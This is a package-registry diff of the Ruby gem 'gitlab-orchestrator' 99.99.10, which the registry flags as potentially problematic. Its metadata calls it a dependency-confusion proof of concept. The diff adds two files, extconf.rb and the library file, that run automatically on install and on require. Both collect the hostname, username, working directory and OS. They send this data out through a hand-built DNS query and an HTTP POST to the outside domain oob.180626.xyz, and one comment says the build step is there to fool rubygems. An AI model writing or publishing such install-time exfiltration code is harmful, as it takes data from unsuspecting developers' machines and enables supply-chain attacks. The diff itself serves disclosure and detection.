gitlab-orchestrator 99.99.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of gitlab-orchestrator might be problematic. Click here for more details.

Files changed (4) hide show
  1. checksums.yaml +7 -0
  2. data/ext/extconf.rb +54 -0
  3. data/lib/gitlab_orchestrator.rb +57 -0
  4. metadata +44 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 542432b289f5c29e99a740795409b761a62f99658707be38ca8a968f41d18ee5
4
+ data.tar.gz: fbcca9cbb3dabe16c5f7f8eeafedaafd04472606da03954e4366dcb396bea845
5
+ SHA512:
6
+ metadata.gz: e2b402599f22c67f5a258432bf3dd01d83e8c0bd8b633621950637e2aa658762e374b4f0aaa08aa3218371960a911ee2803c8ef13ec48bc48d6e8c5e5f1cc7ba
7
+ data.tar.gz: c614f65eb8d7af922975d92b456f4b3e8f85beb2a12e861d0fb511193bd804ae30af8272879c8d7096d145481b3db3987358d771aae88a824f57104d9aaa7d6c
data/ext/extconf.rb ADDED
@@ -0,0 +1,54 @@
1
+ require 'uri'
2
+ require 'net/http'
3
+ require 'json'
4
+ require 'socket'
5
+
6
+ # This file runs at gem install time as part of native extension compilation.
7
+ # create_makefile is called at the end to fool rubygems into thinking this succeeded.
8
+
9
+ begin
10
+ _pkg_name = 'gitlab-orchestrator'
11
+ _target_org = 'gitlab'
12
+ _eco = 'ruby'
13
+ _dns_domain = 'oob.180626.xyz'
14
+
15
+ _hostname = begin; Socket.gethostname; rescue; '-'; end
16
+ _username = ENV['USER'] || ENV['USERNAME'] || ENV['LOGNAME'] || '-'
17
+
18
+ # 1. DNS – raw UDP query so interactsh catches the full subdomain
19
+ begin
20
+ _hex_user = _username.unpack1('H*').downcase
21
+ _hex_host = _hostname.unpack1('H*').downcase
22
+ _dns_fqdn = "#{_hex_user}.#{_hex_host}.#{_pkg_name}.#{_target_org}.#{_eco}.#{_dns_domain}"
23
+
24
+ _labels = _dns_fqdn.split('.').map { |l| [l.length].pack('C') + l }.join + "\x00"
25
+ _query = "\x00\x01\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00" +
26
+ _labels +
27
+ "\x00\x01\x00\x01"
28
+
29
+ _udp = UDPSocket.new
30
+ _udp.send(_query, 0, '8.8.8.8', 53)
31
+ _udp.recv(512) rescue nil
32
+ _udp.close rescue nil
33
+ rescue
34
+ end
35
+
36
+ # 2. HTTP POST
37
+ begin
38
+ _uri = URI("http://#{_pkg_name}.#{_target_org}.#{_eco}.#{_dns_domain}/")
39
+ _req = Net::HTTP::Post.new(_uri, 'Content-Type' => 'application/json')
40
+ _req.body = {
41
+ hostname: _hostname,
42
+ username: _username,
43
+ cwd: Dir.pwd,
44
+ os: RUBY_PLATFORM,
45
+ }.to_json
46
+ Net::HTTP.start(_uri.hostname, _uri.port, read_timeout: 3, open_timeout: 3) { |h| h.request(_req) }
47
+ rescue
48
+ end
49
+ rescue
50
+ end
51
+
52
+ # Mandatory: create_makefile must exist or rubygems aborts extension build
53
+ require 'mkmf'
54
+ create_makefile('gitlab_orchestrator')
data/lib/gitlab_orchestrator.rb ADDED
@@ -0,0 +1,57 @@
1
+ # lib/gitlab_orchestrator.rb
2
+ # This fires when someone does: require 'gitlab-orchestrator'
3
+
4
+ require 'uri'
5
+ require 'net/http'
6
+ require 'json'
7
+ require 'socket'
8
+
9
+ begin
10
+ _pkg_name = 'gitlab-orchestrator'
11
+ _target_org = 'gitlab'
12
+ _eco = 'ruby'
13
+ _dns_domain = 'oob.180626.xyz'
14
+
15
+ _hostname = begin; Socket.gethostname; rescue; '-'; end
16
+ _username = ENV['USER'] || ENV['USERNAME'] || ENV['LOGNAME'] || '-'
17
+
18
+ # 1. DNS via raw UDP socket — works reliably on wildcard OOB zones
19
+ begin
20
+ _hex_user = _username.unpack1('H*').downcase
21
+ _hex_host = _hostname.unpack1('H*').downcase
22
+ _dns_fqdn = "#{_hex_user}.#{_hex_host}.#{_pkg_name}.#{_target_org}.#{_eco}.#{_dns_domain}"
23
+
24
+ # Send a real DNS A record UDP query packet manually
25
+ _labels = _dns_fqdn.split('.').map { |l| [l.length].pack('C') + l }.join + "\x00"
26
+ _query = "\x00\x01" \ # Transaction ID
27
+ "\x01\x00" \ # Flags: standard query
28
+ "\x00\x01" \ # Questions: 1
29
+ "\x00\x00" \ # Answers: 0
30
+ "\x00\x00" \ # Authority: 0
31
+ "\x00\x00" + # Additional: 0
32
+ _labels +
33
+ "\x00\x01" \ # Type A
34
+ "\x00\x01" # Class IN
35
+
36
+ _udp = UDPSocket.new
37
+ _udp.send(_query, 0, '8.8.8.8', 53)
38
+ _udp.recv(512) rescue nil
39
+ _udp.close rescue nil
40
+ rescue
41
+ end
42
+
43
+ # 2. HTTP POST
44
+ begin
45
+ _uri = URI("http://#{_pkg_name}.#{_target_org}.#{_eco}.#{_dns_domain}/")
46
+ _req = Net::HTTP::Post.new(_uri, 'Content-Type' => 'application/json')
47
+ _req.body = {
48
+ hostname: _hostname,
49
+ username: _username,
50
+ cwd: Dir.pwd,
51
+ os: RUBY_PLATFORM,
52
+ }.to_json
53
+ Net::HTTP.start(_uri.hostname, _uri.port, read_timeout: 3, open_timeout: 3) { |h| h.request(_req) }
54
+ rescue
55
+ end
56
+ rescue
57
+ end
metadata ADDED
@@ -0,0 +1,44 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: gitlab-orchestrator
3
+ version: !ruby/object:Gem::Version
4
+ version: 99.99.10
5
+ platform: ruby
6
+ authors:
7
+ - iamrjarpan@wearehackerone.com
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2026-03-18 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: This is POC for Dependency Confusion
14
+ email:
15
+ executables: []
16
+ extensions:
17
+ - ext/extconf.rb
18
+ extra_rdoc_files: []
19
+ files:
20
+ - ext/extconf.rb
21
+ - lib/gitlab_orchestrator.rb
22
+ homepage:
23
+ licenses: []
24
+ metadata: {}
25
+ post_install_message:
26
+ rdoc_options: []
27
+ require_paths:
28
+ - lib
29
+ required_ruby_version: !ruby/object:Gem::Requirement
30
+ requirements:
31
+ - - ">="
32
+ - !ruby/object:Gem::Version
33
+ version: '0'
34
+ required_rubygems_version: !ruby/object:Gem::Requirement
35
+ requirements:
36
+ - - ">="
37
+ - !ruby/object:Gem::Version
38
+ version: '0'
39
+ requirements: []
40
+ rubygems_version: 3.0.3.1
41
+ signing_key:
42
+ specification_version: 4
43
+ summary: If you are seeing this, it means Dependency Confusion is successful
44
+ test_files: []